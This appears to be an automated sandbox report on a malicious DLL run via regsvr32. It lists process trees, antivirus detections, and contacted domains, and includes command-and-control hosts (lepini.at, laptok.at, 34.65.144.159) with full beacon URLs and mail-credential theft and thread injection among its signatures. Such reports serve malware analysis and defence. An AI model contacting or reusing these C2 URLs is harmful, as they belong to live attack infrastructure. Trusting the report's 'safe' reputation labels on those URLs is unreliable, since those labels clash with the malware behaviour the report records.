registry values via WMI 19->85 34 control.exe 19->34         started        36 iexplore.exe 1 84 21->36         started        signatures8 process9 dnsIp10 63 c56.lepini.at 23->63 65 api3.lepini.at 23->65 97 Tries to steal Mail credentials (via file access) 23->97 99 Changes memory attributes in foreign processes to executable or writable 23->99 101 Modifies the context of a thread in another process (thread injection) 23->101 103 3 other signatures 23->103 53 C:\Users\user\AppData\Local\...\mu1rnx1a.dll, PE32 27->53 dropped 38 cvtres.exe 27->38         started        55 C:\Users\user\AppData\Local\...\yacmzdf3.dll, PE32 30->55 dropped 40 rundll32.exe 34->40         started        42 iexplore.exe 158 36->42         started        45 iexplore.exe 29 36->45         started        47 iexplore.exe 29 36->47         started        49 iexplore.exe 29 36->49         started        file11 signatures12 process13 dnsIp14 67 img.img-taboola.com 42->67 69 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49746, 49747 FASTLYUS United States 42->69 73 8 other IPs or domains 42->73 71 api10.laptok.at 34.65.144.159, 49755, 49756, 49760 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 45->71 51 cvtres.exe 45->51         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NJPcHPuRcG.dll16%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.3.regsvr32.exe.4c3e4a0.2.unpack100%AviraHEUR/AGEN.1132033Download File
          2.2.regsvr32.exe.2770000.1.unpack100%AviraHEUR/AGEN.1108168Download File
          2.3.regsvr32.exe.4eb94a0.1.unpack100%AviraHEUR/AGEN.1132033Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
          http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
          http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh00%Avira URL Cloudsafe
          http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm0%Avira URL Cloudsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          contextual.media.net
          		23.210.250.97
          		truefalse
            		high
            tls13.taboola.map.fastly.net
            		151.101.1.44
            		truefalse
              		unknown
              hblg.media.net
              		23.210.250.97
              		truefalse
                		high
                c56.lepini.at
                		34.65.144.159
                		truefalse
                  		unknown
                  lg3.media.net
                  		23.210.250.97
                  		truefalse
                    		high
                    resolver1.opendns.com
                    		208.67.222.222
                    		truefalse
                      		high
                      api3.lepini.at
                      		34.65.144.159
                      		truefalse
                        		unknown
                        geolocation.onetrust.com
                        		104.20.184.68
                        		truefalse
                          		high
                          api10.laptok.at
                          		34.65.144.159
                          		truefalse
                            		unknown
                            www.msn.com
                            		unknown
                            		unknownfalse
                              		high
                              srtb.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                img.img-taboola.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  web.vortex.data.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    cvision.media.net
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://search.chol.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.mercadolivre.com.br/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://search.ebay.de/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.mtv.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.rambler.ru/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.nifty.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.dailymail.co.uk/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www3.fnac.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://buscar.ya.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://search.yahoo.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://constitution.org/usdeclar.txtC:regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://https://file://USER.ID%lu.exe/updregsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.sogou.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://asp.usatoday.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://fr.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wexplorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://rover.ebay.comexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://in.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.ebay.in/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://%s.comexplorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		low
                                                                        http://msk.afisha.ru/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.zhongyicts.com.cnexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://search.rediff.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.ya.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhmexplorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://search.naver.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.google.ru/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.abril.com.br/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://search.daum.net/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://contoso.com/Iconpowershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://search.naver.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.clarin.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://buscar.ozu.es/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://kr.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://search.about.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://busca.igbusca.com.br/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.ask.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.priceminister.com/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.cjmall.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://search.centrum.cz/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.carterandcone.comlexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://suche.t-online.de/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.google.it/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://search.auction.co.kr/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.ceneo.pl/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.amazon.de/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://sads.myspace.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://google.pchome.com.tw/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.rambler.ru/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://uk.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://espanol.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.ozu.es/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://search.sify.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://openimage.interpark.com/interpark.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://search.ebay.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.gmarket.co.kr/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://search.nifty.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://searchresults.news.com.au/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.google.si/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.google.cz/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.soso.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.univision.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.ebay.it/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.asharqalawsat.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://busca.orange.es/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://search.yahoo.co.jpexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.target.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://buscador.terra.es/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.typography.netDexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://fontfabrik.comexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://search.orange.co.uk/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.iask.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.tesco.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                            		high

                                                                                                                                                            Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
